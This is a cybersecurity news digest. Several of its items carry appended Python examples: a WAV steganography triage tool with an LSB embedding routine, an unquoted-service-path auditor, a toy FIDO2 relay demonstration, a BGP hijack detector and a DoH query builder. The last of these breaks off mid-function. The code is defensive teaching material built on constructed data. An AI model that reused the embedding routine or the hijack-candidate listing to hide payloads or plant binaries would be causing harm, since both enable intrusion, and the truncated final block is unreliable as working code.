News Items

  • news

    Winner of 7th Paper Competition is Evaluating Fuzz Testing

    The winning paper is Evaluating Fuzz Testing by George Klees, Andrew Ruef, Benji Cooper, Shiyi Wei, and Michael Hicks. This paper was presented at ACM SIGSAC Conference on Computer and Communications Security (CCS '18) in Toronto.

  • news

    NSA Launches Latest Codebreaker Challenge

    By Betsy Stein NSA/CSS Communications Officer

    FORT MEADE, MD, Sept. 20, 2019 --

    Are you a U.S. undergraduate or graduate student interested in attempting to crack a cyber-challenge similar to those that regularly threaten national security? Then sign up for the 2019 NSA Codebreaker Challenge!

  • news

    NIST Releases Draft Security Feature Recommendations for IoT Devices

    "Core Baseline" guide offers practical advice for using everyday items that link to computer networks.

    August 01, 2019

  • news

    NSA-approved cybersecurity law and policy course now available online

    Cyber Scoop

    Shannon Vavra

    August 27th, 2019

    Anyone who is interested in cybersecurity law and policy can now take an online course that was partly shaped by National Security Agency.

  • news

    Game-theoretic Paper Wins Annual Paper Competition

    The winner of the 6th Annual Best Scientific Cybersecurity Paper Competition is How Shall We Play a Game? A Game-theoretical Model for Cyber-warfare Games by Tiffany Bao, Yan Shoshitaishvili, Ruoyu Wang, Christopher Kruegel, Giovanni Vigna, and David Brumley. These researchers are from Carnegie Mellon University and University of California, Santa Barbara. This paper was originally accepted at 30th IEEE Computer Security Foundations Symposium (CSF '17).

    To learn more visit the competition homepage: https://cps-vo.org/group/sos/papercompetition/pastcompetitions

  • news

    NSA SoS Lablet Call for Proposals is Open

    The National Security Agency has distributed its BAA (in effect a request for proposals) for its next generation of SoS Lablets. The call covers lablets on the five Hard Problem areas in Science of Security, on the Science of Privacy, and on Cyber-Physical Systems. Proposals are due August 21. The SoS team is not the point of contact for the contracting process, but can help direct inquiries: https://cps-vo.org/group/SoS/contact

  • news

    "Facebook's Bug Bounty Gets Bigger for Third-Party Apps"

    In an effort to improve Facebook's security and privacy, the social media giant will enhance its bug bounty programs by allowing security researchers to actively search for vulnerabilities in third-party apps and websites that integrate with its platform. Instead of passively observing third-party apps and websites for vulnerabilities, security researchers will be able to test the apps and websites for security flaws. However, they must have permission from the third-party to do so. Allowing security researchers to take on a more active approach will result in the discovery of more vulnerabilities as they would be able to look at the different ways in which a third-party app could be exploited by attackers to abuse a user's data. In addition, those that discover rare security vulnerabilities will be rewarded with a $15,000 bonus. This article continues to discuss the expansion of Facebook's bug bounty programs.

    CNET reports "Facebook's Bug Bounty Gets Bigger for Third-Party Apps"

  • news

    "New Cryptomining Malware Uses WAV Audio Files to Conceal Its Tracks"

    Security researchers at Cylance have discovered a new campaign that uses steganography to distribute cryptomining malware. Steganography hides malicious data inside an ordinary-looking carrier, such as an image, a video, or another multimedia file, so that the delivery of the malware is not apparent. It differs from cryptography in that it conceals the existence of the data rather than rendering its contents unreadable. The technique remains effective because most users do not expect a media file such as a digital image to carry malware. In this case, the researchers found that the attackers had hidden cryptomining malware inside WAV audio files. This article continues to discuss the steganography technique employed in the new cryptomining campaign.

    TNW reports "New Cryptomining Malware Uses WAV Audio Files to Conceal Its Tracks"
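    The item above describes the carrier but not how a defender would look inside one. The following is an added example, not code from the article or from Cylance, showing one generic way to triage a WAV file: walk its RIFF chunk list, flag data appended past the declared length or non-standard chunks, and reassemble the least-significant-bit plane of the PCM samples to see whether it starts with an executable header. The carrier, the "MZ" stand-in payload, and the LSB embedding are constructed here for the demonstration; nothing about the real campaign's encoding is assumed.

```python
import struct
from typing import List, Tuple

# Constructed test material (not samples from the campaign). The carrier's samples
# are all even, so its LSB plane is all zeros. Real audio has noisy LSBs, which is
# why LSB embedding is hard to spot statistically and why the check below looks for
# structure (a file header) in the extracted plane instead.
CARRIER: List[int] = [((i * 37) % 200 - 100) * 20 for i in range(512)]
FAKE_PAYLOAD = b"MZ" + b"\x90" * 30          # stand-in for an embedded PE file


def build_wav(samples: List[int], sample_rate: int = 8000) -> bytes:
    """Minimal RIFF/WAVE file: 'fmt ' chunk + 'data' chunk, PCM, mono, 16 bit."""
    data = b"".join(struct.pack("<h", s) for s in samples)
    fmt = struct.pack("<HHIIHH", 1, 1, sample_rate, sample_rate * 2, 2, 16)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(data)) + data)
    return b"RIFF" + struct.pack("<I", len(body)) + body


def lsb_embed(samples: List[int], payload: bytes) -> List[int]:
    """Overwrite the LSB of consecutive samples with the payload bits, MSB-first per byte."""
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    if len(bits) > len(samples):
        raise ValueError("carrier too short for payload")
    out = list(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit
    return out


def parse_chunks(wav: bytes) -> Tuple[List[Tuple[bytes, bytes]], bytes]:
    """Walk the RIFF chunk list; return [(id, payload), ...] and any bytes past the
    declared RIFF length (a simple place to append a payload)."""
    if wav[:4] != b"RIFF" or wav[8:12] != b"WAVE":
        raise ValueError("not a WAVE file")
    end = 8 + struct.unpack("<I", wav[4:8])[0]
    chunks, pos = [], 12
    while pos + 8 <= end:
        cid = wav[pos:pos + 4]
        clen = struct.unpack("<I", wav[pos + 4:pos + 8])[0]
        chunks.append((cid, wav[pos + 8:pos + 8 + clen]))
        pos += 8 + clen + (clen & 1)          # chunks are padded to even length
    return chunks, wav[end:]


def lsb_plane(pcm: bytes) -> bytes:
    """Reassemble the LSB of each 16-bit sample into bytes (inverse of lsb_embed)."""
    n = len(pcm) // 2
    samples = struct.unpack("<%dh" % n, pcm[:n * 2])
    out = bytearray()
    for i in range(0, len(samples) - 7, 8):
        byte = 0
        for s in samples[i:i + 8]:
            byte = (byte << 1) | (s & 1)
        out.append(byte)
    return bytes(out)


STANDARD_CHUNKS = {b"fmt ", b"data", b"LIST", b"fact", b"cue "}
MAGICS = {b"MZ": "PE/DOS executable", b"\x7fELF": "ELF", b"PK\x03\x04": "ZIP"}


def inspect_wav(wav: bytes) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    chunks, trailing = parse_chunks(wav)
    if trailing:
        findings.append(f"{len(trailing)} bytes appended after the RIFF payload")
    for cid, body in chunks:
        if cid not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {cid!r} ({len(body)} bytes)")
        if cid == b"data":
            plane = lsb_plane(body)
            for magic, name in MAGICS.items():
                if plane.startswith(magic):
                    findings.append(f"LSB plane of audio starts with a {name} header")
    return findings
```

    The magic-header scan only catches a payload stored in the clear at the start of the bit plane; a loader that encrypts or scatters the payload defeats it, which is why in practice the WAV is best examined together with the code that reads it.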

  • news

    "Silent Librarian Retools Phishing Emails to Hook Student Credentials"

    The threat group known as Silent Librarian, TA407, or Cobalt Dickens has been observed using new tactics in an updated phishing campaign. Silent Librarian targets university students in order to steal their login credentials. According to researchers at Proofpoint, the group's recent campaign uses shortened URLs in its phishing emails, which hide the true destination and make the phishing attempt harder to detect. These URLs redirect victims to revamped attacker-hosted landing pages that display university-specific banners, such as emergency or weather notifications. This article continues to discuss the operations, new tactics, targets, and impact of the Silent Librarian threat group.

    Threatpost reports "Silent Librarian Retools Phishing Emails to Hook Student Credentials"

  • news

    "A new Mac Malware Dubbed Tarmac has Been Distributed via Malvertising Campaigns"

    Malvertising campaigns have been found distributing macOS malware that combines Shlayer and Tarmac. The campaigns have targeted users in the US, Italy, and Japan. When a user clicks a malicious ad, they are redirected to sites showing pop-ups that push fake software updates, mainly for Adobe Flash Player. Once executed, the fake update installs the OSX/Shlayer malware, which in turn runs the final payload, OSX/Tarmac. Tarmac thus acts as a second-stage payload for the Shlayer infection.

    Cyber Defense Magazine reports: "A new Mac Malware Dubbed Tarmac has Been Distributed via Malvertising Campaigns"

  • news

    "FIN7 Gang Returns With New Malicious Tools"

    The financially motivated hacking group FIN7 is back with new malicious tools. FIN7 is known for targeting businesses such as fast-food restaurants, hotels, and casinos in order to steal payment data such as credit card numbers, installing customized malware on point-of-sale (PoS) machines and IT networks after gaining access through spear-phishing. According to researchers at FireEye, the group is now deploying a new dropper, called Boostwrite, that evades detection by being signed with a valid code-signing certificate. Boostwrite delivers a new payload, called Rdfsniffer, that tampers with a remote administration tool used to service payment systems and PoS machines. This article continues to discuss the FIN7 hacking group in relation to its newly discovered malicious tools and techniques.

    BankInfoSecurity reports "FIN7 Gang Returns With New Malicious Tools"

  • news

    "Beyond Testing: The Human Element of Application Security"

    According to Veracode's recent State of Software Security (SOSS) report, analysis of results from more than 700,000 application scans revealed that 83 percent of the applications contained one or more vulnerabilities. These results call for improving application security with human solutions as well as tooling. For an application security program to be effective, the role of the human in the security process must be strengthened. Experts recommend that developers receive training on secure coding. In addition, organizations are encouraged to establish bug bounty programs and strong vulnerability disclosure policies so that outside security researchers can find vulnerabilities in their software and properly disclose the security risks they discover. This article continues to discuss the importance of improving application security, secure code training, vulnerability disclosure policies, and bug bounty programs.

    Security Boulevard reports "Beyond Testing: The Human Element of Application Security"

  • news

    "Protecting Smart Machines From Smart Attacks"

    A team of researchers at Princeton University conducted studies on how adversaries can attack machine learning models. As the application of machine learning grows, it is important that we examine the different ways in which this technology can be exploited by attackers to develop countermeasures against them. The researchers demonstrated different adversarial machine learning attacks, which include data poisoning attacks, evasion attacks, and privacy attacks. Data poisoning attacks occur when an adversary inserts bad data into an AI system's training set. Evasion attacks refer to the manipulation of an input so that it appears normal to a human, but can be incorrectly classified by the machine learning model. Privacy attacks are performed when adversaries try to expose sensitive information using data learned by the machine learning model. This article continues to discuss the importance of exploring the vulnerabilities of machine learning technologies and the adversarial machine learning attacks demonstrated by researchers.

    Princeton University reports "Protecting Smart Machines From Smart Attacks"

  • news

    "Fake Mobile app Fraud Tripled in First Half of 2019"

    In its fraud report covering the second quarter of 2019, RSA Security identified 57,406 fraud attacks worldwide. Phishing was the most prevalent attack type (37%), followed by fake mobile apps, usually apps posing as those of popular brands. Comparing the first half of 2019 with the second half of 2018, phishing attacks rose by 6 percent, while attacks using financial malware and rogue mobile apps increased far more sharply: the use of financial malware grew by 80 percent and the use of rogue mobile apps by 191 percent.

    Help Net Security reports: "Fake Mobile app Fraud Tripled in First Half of 2019"

  • news

    "How Do We Ensure GNSS Security Against Spoofing?"

    The Global Navigation Satellite System (GNSS) refers to satellite navigation systems that provide positioning, navigation, and timing (PNT) services with global coverage. If the GNSS were to suffer a major outage for one day, it would cost the U.S. an estimated $1 billion in damage as this system is relied upon for automation, efficiency, and safety. All of the ways in which the GNSS can be exploited by attackers must be further explored in order to improve the security of this system against attacks such as GPS spoofing. GPS spoofing occurs when an attacker interferes with legitimate GPS signals using a radio transmitter that is near a target. In the context of military combat, an adversary could execute GPS spoofing attacks to manipulate GPS receivers, which could lead to the hijacking of autonomous vehicles and robotic devices. This article continues to discuss the concept of GPS/GNSS spoofing, incidents of GPS spoofing, the different types of spoofing, and how receivers can be protected against spoofing attacks.

    GPS World reports "How Do We Ensure GNSS Security Against Spoofing?"

  • news

    "Mathematicians Prove That Flash-Memory 'Fingerprints' of Electronic Devices Are Truly Unique"

    Mathematicians at RUDN University have proven that the defects in flash memory cells can be used as fingerprints for memory chips. This method will strengthen the security of electronic devices against hacks. The growth of devices such as smartphones, fitness bracelets, and memory devices continues to raise concerns about the theft and unauthorized alteration of these devices. Devices can currently be identified either virtually, with unique numbers hard-coded into the device, or physically, using fluctuations in a device's radio-frequency emissions as the identifier. Both approaches can be subverted: the software holding the number can be hacked, and radio signals can be interfered with. The new method of physical identification relies on microscopic manufacturing defects that leave some flash memory cells damaged. Because the pattern of microdefects is truly unique, it can be used to distinguish one device from another. This article continues to discuss existing device identification methods, the new method of physical identification based on damaged flash memory cells, and how experts from RUDN University verified the effectiveness of this method.

    TechXplore reports "Mathematicians Prove That Flash-Memory 'Fingerprints' of Electronic Devices Are Truly Unique"

  • news

    "AI Development has Major Security, Privacy and Ethical Blind Spots"

    In a new study, it has been discovered that the most serious blind spot during AI development is security. Nearly three-quarters (73%) of respondents in the study, indicated they don't check for security vulnerabilities during model building. More than half (59%) of organizations also don't consider fairness, bias or ethical issues during ML development. It was also found that privacy is similarly neglected, with only 35% checking for issues during model building and deployment. The majority (55%) of developers mitigate against unexpected outcomes or predictions, but this still leaves a large number who don't. Of the respondents, 16% don't check for any risks at all during development.

    Help Net Security reports: "AI Development has Major Security, Privacy and Ethical Blind Spots"

  • news

    "NAU Cyberengineering Team Wins $6M Grant to Develop Computing Solutions to Combat Cyberattacks"

    The U.S. Air Force has awarded a $6.3 million grant to a team of researchers at Northern Arizona University. The grant was given to support the development of novel solutions to the growing sophistication and frequency of cyberattacks as well as the increasing threat posed by cyber warfare. The researchers will explore the possible ways in which hackers can be defeated through the use of new hardware technologies as traditional protection methods such as using virus detection and firewalls have been proven to be insufficient. Key technology modules will be developed by researchers, which will introduce new types of protection in the realms of cryptography, physical unclonable functions, blockchain, and key distribution. This project is expected to help improve the security of power plants, transportation systems, medical devices, and more. This article continues to discuss the support, goals, and structure of the NAU-led research project.

    NAU reports "NAU Cyberengineering Team Wins $6M Grant to Develop Computing Solutions to Combat Cyberattacks"

  • news

    "Group Said to Be Behind Attempted Campaign Hack Has Also Gone After Cybersecurity Researchers"

    The Iranian-linked hacking group that made more than 2,000 attempts to compromise email accounts associated with a U.S. presidential campaign, government officials, journalists, and prominent Iranians living outside Iran is also said to be targeting cybersecurity researchers. According to researchers at ClearSky Cyber Security, the group known as Charming Kitten, APT35, or Phosphorus has been sending phishing emails to them. The hacking group also created a phishing website that appears to belong to ClearSky. In addition, the group built a fake web-mail page aimed at attacking ClearSky's clients. Such efforts highlight the lengths to which attackers may go to retaliate against the researchers who expose their operations. This article continues to discuss the attacks executed by the Iranian hacking group against cybersecurity researchers and other discoveries surrounding the group's latest activities.

    CyberScoop reports "Group Said to Be Behind Attempted Campaign Hack Has Also Gone After Cybersecurity Researchers"

  • news

    "New Data Analysis Approach Could Strengthen the Security of IoT Devices"

    Researchers have shown that a multi-pronged data analysis approach can strengthen the security of IoT devices. One technique applied during the study was the freely available open-source R statistical environment, which the researchers used to characterize the IoT systems. They also used machine learning to search for patterns in the data that were not apparent with R, and the widely deployed Splunk log analysis platform to detect intrusions. Using these tools, the researchers identified three IP addresses that were actively trying to break into the devices on the Canberra network. The researchers believe that analyzing IoT data with this approach may enable security professionals to identify and manage controls that mitigate risk and to analyze incidents as they occur. They also hope the research will help professionals create protocols for IoT security.

    Help Net Security Reports "New Data Analysis Approach Could Strengthen the Security of IoT Devices"

  • news

    "NIST is Hunting for Tech to Secure the Energy Sector's Network"

    Efforts are being made by the U.S. National Institute of Standards and Technology's (NIST) National Cybersecurity Center of Excellence (NCCoE) to bolster the security of the Industrial Internet of Things (IIoT) attached to the nation's power grid. Through a program, NCCoE seeks to develop a solution for strengthening IIoT in a distributed energy resource environment. The flow of data from distributed energy resources (DERs), including wind turbines and solar panels, must be secured as such resources increase the vulnerability of the grid to disruption by cyberattackers. This article continues to discuss the focus and goals of the program as well as the increase in DERs that are being connected to the power grid, how such resources are introducing more threats to the grid, and other efforts to defend the grid against cyberthreats.

    NextGov reports "NIST is Hunting for Tech to Secure the Energy Sector's Network"

  • news

    "NIST and Microsoft Partner to Improve Enterprise Patching Strategies"

    Microsoft and the U.S. NIST National Cybersecurity Center of Excellence (NCCoE) will team up to help enterprises improve their security patch management strategies. Better patching strategies could have reduced the impact of WannaCry and NotPetya. Following these attacks, Microsoft looked into the challenges faced by customers in regard to security patches. The analysis of these challenges further emphasized the importance of establishing better industry guidance and standards for enterprise patch management. The partnership between Microsoft and the NCCoE will be in support of developing common enterprise management reference architectures, validating implementation instructions in the NCCoE lab, and more. This article continues to discuss the joint project and the importance of improving enterprise patching strategies.

    Security Week reports "NIST and Microsoft Partner to Improve Enterprise Patching Strategies"

  • news

    "BitPaymer Ransomware Attackers Exploit Apple Flaw to Bypass Detection"

    Apple has patched a zero-day flaw in iTunes for Windows and iCloud for Windows. The bug was in Bonjour, a component bundled with iTunes for Windows that is used to deliver updates and to let services discover each other. According to researchers at Morphisec, the bug is an unquoted service path: the path to the service's executable is stored without surrounding quotation marks, so when the path contains spaces Windows may try to run a differently named file located earlier in that path, which an attacker with write access to the directory can supply. The attackers exploited the bug to run the BitPaymer ransomware, also known as IEncrypt, in a way that sidestepped security defenses such as antivirus software. This article continues to discuss the zero-day flaw in the Bonjour updater, the type of vulnerability it was, its exploitation by attackers to execute ransomware, how it was addressed by Apple, and the effectiveness of the exploit.

    SC Media reports "BitPaymer Ransomware Attackers Exploit Apple Flaw to Bypass Detection"
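    The paragraph above names the bug class but not how to find it on a fleet. The following is an added example, not from the article, from Morphisec or from Apple: it takes service ImagePath values as they appear in the Windows registry and, for any unquoted path containing spaces, lists the file names Windows would try before the intended binary, which are exactly the locations a defender must check for weak directory permissions. The service names and paths are constructed for the demonstration and make no claim about the real Bonjour service's path.

```python
import re
from typing import Dict, List

# Constructed sample entries (hypothetical names and paths, not captured from a real
# host). Real input would come from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath,
# e.g. via `Get-CimInstance Win32_Service | Select-Object Name, PathName` on Windows.
SAMPLE_SERVICES: Dict[str, str] = {
    "QuotedSvc": r'"C:\Program Files\Good Vendor\svc.exe" --run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "VendorUpdater": r"C:\Program Files (x86)\Some Vendor\Updater Tool\update.exe /silent",
}

# Executable portion of an unquoted ImagePath: everything up to the first ".exe".
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE | re.DOTALL)


def executable_part(image_path: str) -> str:
    """Return the executable path portion of an ImagePath, stripped of quotes and arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end] if end != -1 else path[1:]
    m = _EXE_RE.match(path)
    return m.group(1) if m else path.split(" ")[0]


def hijack_candidates(image_path: str) -> List[str]:
    """Paths the service control manager would try, in order, before the intended
    binary when the path is unquoted and contains spaces (each prefix ending at a
    space, with .exe appended). An empty list means the entry is not vulnerable."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    exe = executable_part(path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each vulnerable service to the candidate paths an attacker who can write
    to one of those directories could plant a binary at."""
    report: Dict[str, List[str]] = {}
    for name, path in services.items():
        candidates = hijack_candidates(path)
        if candidates:
            report[name] = candidates
    return report
```

    Finding a candidate path is only half the check: the bug is exploitable when a non-administrator can create files in one of those directories (inspect with `icacls` on the host), and the fix on the service side is simply to quote the ImagePath.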

  • news

    "Attackers Hide Behind Trusted Domains, HTTPS"

    A new report from Webroot brings further attention to the use of HTTPS domains to host phishing attacks. Hypertext Transfer Protocol Secure (HTTPS) is the secure version of HTTP that uses the Transport Layer Security (TLS) protocol to secure connections between browsers and web servers in order to prevent the eavesdropping of users' private information, including passwords and web searches. The presence of "https" and a green padlock symbol in a browser's address bar gives users a false sense of security as there is no guarantee that the information encrypted and securely delivered by HTTPS is going to a safe destination. This article continues to discuss the use of trusted domains and HTTPS by attackers in addition to the increased targeting of older operating systems and the rise in malware variants.

    Dark Reading reports "Attackers Hide Behind Trusted Domains, HTTPS"

  • news

    "Combination of Techniques Could Improve Security for IoT Devices"

    A team of researchers at Penn State World Campus has developed an approach that combines several techniques to bolster the security of Internet of Things (IoT) devices such as smart TVs, smart speakers, wearables, and home video cameras. According to one researcher, the number of IoT devices in operation will reach 20 billion by 2020, which increases users' exposure to security breaches. The breach of IoT devices could threaten the privacy and safety of users. The approach the researchers created to maintain the security of IoT systems and identify attacks involves the use of statistical data, machine learning, intrusion detection tools, visualization tools, and more. This article continues to discuss the techniques and tools applied in the team's approach, as well as how this approach will help security professionals strengthen IoT device security.

    EurekAlert! reports "Combination of Techniques Could Improve Security for IoT Devices"

  • news

    "Hackers Bypassing Some Types of 2FA Security FBI Warns"

    The FBI has warned that some types of two-factor authentication (2FA) can no longer be relied on to keep adversaries out. There are several methods cyber actors use to circumvent popular multi-factor authentication techniques in order to obtain the one-time passcode and access protected accounts. The most common is SIM swap fraud, in which the attacker convinces a mobile carrier (or bribes an employee) to port a target's phone number to a SIM the attacker controls, so that the attacker receives the 2FA codes sent via SMS. Using any form of 2FA is still better than relying on a username and password alone, even though some forms are vulnerable. Users who want the strongest available 2FA should consider FIDO2 hardware tokens, a technology that has yet to be undermined by hackers in real-world attacks.

    Naked Security reports: "Hackers Bypassing Some Types of 2FA Security FBI Warns"
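    The item above says FIDO2 tokens have held up where SMS codes have not, but not why. The reason is that an SMS code is a bare secret that can be relayed from wherever it was received, whereas a FIDO2 assertion is bound to the site it was created for. The following added example, not code from the article or from any FIDO2 implementation, walks through the relying-party checks from WebAuthn that defeat a relayed login. The token is a stand-in: it uses an HMAC over a per-site secret in place of a real token's public-key signature, so the block runs with the standard library alone; the relying party name, origins, and challenge are all constructed.

```python
import base64
import hashlib
import hmac
import json
import os
import struct
from typing import Dict, Optional, Tuple

RP_ID = "bank.example"                  # hypothetical relying party
RP_ORIGIN = "https://bank.example"


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


class ToyAuthenticator:
    """Stand-in for a FIDO2 token. A real token signs with a per-credential private key
    and hands the RP the public key; an HMAC over a shared secret is used here only so
    the block runs without a crypto library. The origin binding shown does not depend
    on that substitution."""

    def __init__(self) -> None:
        self.keys: Dict[str, bytes] = {}
        self.counter = 0

    def register(self, rp_id: str) -> bytes:
        key = os.urandom(32)
        self.keys[rp_id] = key
        return key                       # what the RP stores at registration

    def get_assertion(self, rp_id: str, challenge: bytes, origin: str
                      ) -> Optional[Tuple[bytes, bytes, bytes]]:
        """rp_id and origin come from the browser, derived from the page's real origin;
        page script cannot choose them. Returns (clientDataJSON, authData, signature)."""
        key = self.keys.get(rp_id)
        if key is None:                  # no credential for this site: nothing to sign
            return None
        client_data = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                                  "origin": origin}, separators=(",", ":")).encode()
        self.counter += 1                # signCount: lets the RP notice cloned tokens
        auth_data = (hashlib.sha256(rp_id.encode()).digest()    # rpIdHash
                     + b"\x01"                                    # flags: user present
                     + struct.pack("!I", self.counter))
        sig = hmac.new(key, auth_data + hashlib.sha256(client_data).digest(), "sha256").digest()
        return client_data, auth_data, sig


def verify_assertion(key: bytes, expected_challenge: bytes, client_data: bytes,
                     auth_data: bytes, sig: bytes) -> Tuple[bool, str]:
    """Relying-party side: the WebAuthn assertion checks that make a relay fail."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge"        # replay of an old assertion
    if cd.get("origin") != RP_ORIGIN:
        return False, "origin"           # assertion was produced on another site
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash"
    if not auth_data[32] & 0x01:
        return False, "user presence"
    expected = hmac.new(key, auth_data + hashlib.sha256(client_data).digest(), "sha256").digest()
    if not hmac.compare_digest(expected, sig):
        return False, "signature"
    return True, "ok"


def phishing_relay(token: ToyAuthenticator, key: bytes, challenge: bytes) -> Tuple[bool, str]:
    """An attacker at https://bank-login.example (hypothetical) relays the bank's real
    challenge to the victim, just as SMS codes are relayed. The victim's browser derives
    rp_id and origin from the phishing page, so the token has no matching credential."""
    result = token.get_assertion("bank-login.example", challenge, "https://bank-login.example")
    if result is None:
        return False, "no credential for phishing origin"
    return verify_assertion(key, challenge, *result)
```

    The second line of defense is the origin field: even an assertion produced with the correct credential is rejected if the browser recorded a different origin in clientDataJSON, so neither the victim nor the phishing page can hand the attacker anything usable at the real site.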

  • news

    "Using Machine Learning to Hunt Down Cybercriminals"

    Researchers at MIT and the University of California at San Diego (UCSD) have developed a new machine-learning (ML) system intended to prevent IP hijacking incidents before they occur by identifying serial IP hijackers. IP hijacking is a type of cyberattack that exploits the lack of origin authentication in the Internet's routing protocol, the Border Gateway Protocol (BGP). In a BGP hijack, neighboring networks are convinced that the attacker's network has the best path to a block of IP addresses, so traffic destined for those addresses is routed to the attacker. The researchers gathered information from network operator mailing lists and historical BGP data to identify the common traits and behaviors of serial hijackers, then trained their system to recognize those traits so that likely hijacks can be flagged in advance. This article continues to discuss the concept of IP hijacking, the ML system developed to detect such attacks before they occur, and the handling of false positives.

    MIT News report "Using Machine Learning to Hunt Down Cybercriminals"
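    The following is an added example, not the MIT/UCSD system and not code from the article, showing the simplest form of the behavioral signal the paragraph describes: build a baseline of which origin ASes have announced each prefix, flag announcements from an origin never seen for that prefix (a multiple-origin-AS conflict), and then score origins by how many foreign prefixes they announced and how briefly those announcements lasted. The history and live updates are constructed using documentation prefixes and private ASNs; the real system used far richer features than these two.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set


class Update(NamedTuple):
    t: int                              # seconds on a constructed clock
    prefix: str
    origin_as: int
    withdrawn_at: Optional[int] = None  # when the route was withdrawn, if it was


# Constructed baseline window: origins seen for each prefix before t = 1000.
HISTORY: List[Update] = [
    Update(100, "203.0.113.0/24", 64500),
    Update(100, "198.51.100.0/24", 64501),
    Update(100, "192.0.2.0/24", 64502),
    Update(200, "192.0.2.0/24", 64503),        # legitimate multi-homing: two origins
]

# Constructed live updates after the window.
LIVE: List[Update] = [
    Update(1000, "203.0.113.0/24", 65000, 1300),   # foreign origin, withdrawn after 5 min
    Update(1100, "198.51.100.0/24", 65000, 1350),  # same origin grabs a second prefix
    Update(1200, "192.0.2.0/24", 64503),           # known legitimate origin
    Update(1400, "203.0.113.0/24", 64500),         # owner re-announces
    Update(1500, "198.51.100.0/24", 64504),        # new origin but stable (e.g. a transfer)
]


def baseline_origins(history: List[Update]) -> Dict[str, Set[int]]:
    """Every origin AS each prefix was announced by during the baseline window."""
    origins: Dict[str, Set[int]] = defaultdict(set)
    for u in history:
        origins[u.prefix].add(u.origin_as)
    return dict(origins)


def moas_conflicts(baseline: Dict[str, Set[int]], updates: List[Update]) -> List[Update]:
    """Announcements whose origin AS was never seen for that prefix in the baseline."""
    return [u for u in updates if u.origin_as not in baseline.get(u.prefix, set())]


def score_origins(conflicts: List[Update], short_lived: int = 3600) -> Dict[int, Dict[str, int]]:
    """Per conflicting origin AS: number of distinct foreign prefixes announced and how
    many of those announcements were withdrawn within `short_lived` seconds. Many
    prefixes, each held briefly, is the pattern associated with serial hijacking."""
    seen: Dict[int, Set[str]] = defaultdict(set)
    brief: Dict[int, int] = defaultdict(int)
    for u in conflicts:
        seen[u.origin_as].add(u.prefix)
        if u.withdrawn_at is not None and u.withdrawn_at - u.t <= short_lived:
            brief[u.origin_as] += 1
    return {asn: {"prefixes": len(p), "short_lived": brief[asn]} for asn, p in seen.items()}


def suspicious_origins(history: List[Update], updates: List[Update],
                       min_prefixes: int = 2) -> List[int]:
    """Origins that announced at least `min_prefixes` foreign prefixes, at least one briefly."""
    scores = score_origins(moas_conflicts(baseline_origins(history), updates))
    return sorted(asn for asn, s in scores.items()
                  if s["prefixes"] >= min_prefixes and s["short_lived"] >= 1)
```

    A single origin change is not evidence on its own, as the AS 64504 case shows: prefixes do legitimately move between networks. The deployed countermeasure that removes the guesswork for covered prefixes is RPKI route origin validation, which lets a router reject an announcement whose origin AS is not authorized by the prefix holder.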

  • news

    "Twitter Admits It Used Two-Factor Phone Numbers and Emails for Serving Targeted Ads"

    Another incident has raised concerns over the misuse of customer data by social media giants. Twitter recently admitted to using phone numbers and email addresses provided by users to enable two-factor authentication on their accounts for targeted advertising. According to a statement released by the company, this issue derived from its advertising system that allows companies to upload their own marketing list, match with Twitter users, and directly target them in their campaigns. This article continues to discuss the incident, the importance of two-factor authentication, a similar incident that was faced by Facebook last year, and other notable security mistakes made by Twitter.

    TechCrunch reports "Twitter Admits It Used Two-Factor Phone Numbers and Emails for Serving Targeted Ads"

  • news

    "A Controversial Plan to Encrypt More of the Internet"

    Google and Mozilla plan to encrypt a fundamental element of the Internet, the Domain Name System (DNS). Security was not considered in the design of DNS, and DNS requests normally travel in cleartext, which lets attackers observe them and abuse weaknesses in the system through a variety of attacks such as DNS hijacking. The increase in such attacks has prompted the push to encrypt DNS. Two methods that apply web encryption to DNS requests, DNS over HTTPS (DoH) and DNS over TLS (DoT), have already been codified by the Internet Engineering Task Force standards body. This article continues to discuss the concept of DNS, the insecurity of DNS requests, the two protocols aimed at encrypting these requests, and the concerns among cybersecurity professionals about encrypting DNS requests.

    Wired reports "A Controversial Plan to Encrypt More of the Internet"
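    The item above names DoH and DoT without showing what changes on the wire. The following added example, not code from the article or from either browser, builds a standard RFC 1035 DNS query, wraps it the way an RFC 8484 DoH client does for an HTTPS GET (the query itself is unchanged: DoT carries the same bytes over TLS on port 853), and parses the wire-format reply a resolver would return in the HTTPS body. The resolver URL and the reply are constructed; no network is used.

```python
import base64
import struct
from typing import List, Tuple

QTYPE_A = 1


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels terminated by a zero byte."""
    labels = [lbl.encode("ascii") for lbl in name.rstrip(".").split(".")]
    return b"".join(bytes([len(lbl)]) + lbl for lbl in labels) + b"\x00"


def build_query(name: str, qtype: int = QTYPE_A) -> bytes:
    """RFC 1035 query: 12-byte header (ID 0, RD set) + one question. RFC 8484 asks
    DoH clients to use ID 0 so identical queries yield identical, cacheable requests."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def doh_get_url(resolver_url: str, query: bytes) -> str:
    """GET form of DoH: the wire-format query, base64url without padding, as 'dns='."""
    return resolver_url + "?dns=" + base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")


def decode_dns_param(param: str) -> bytes:
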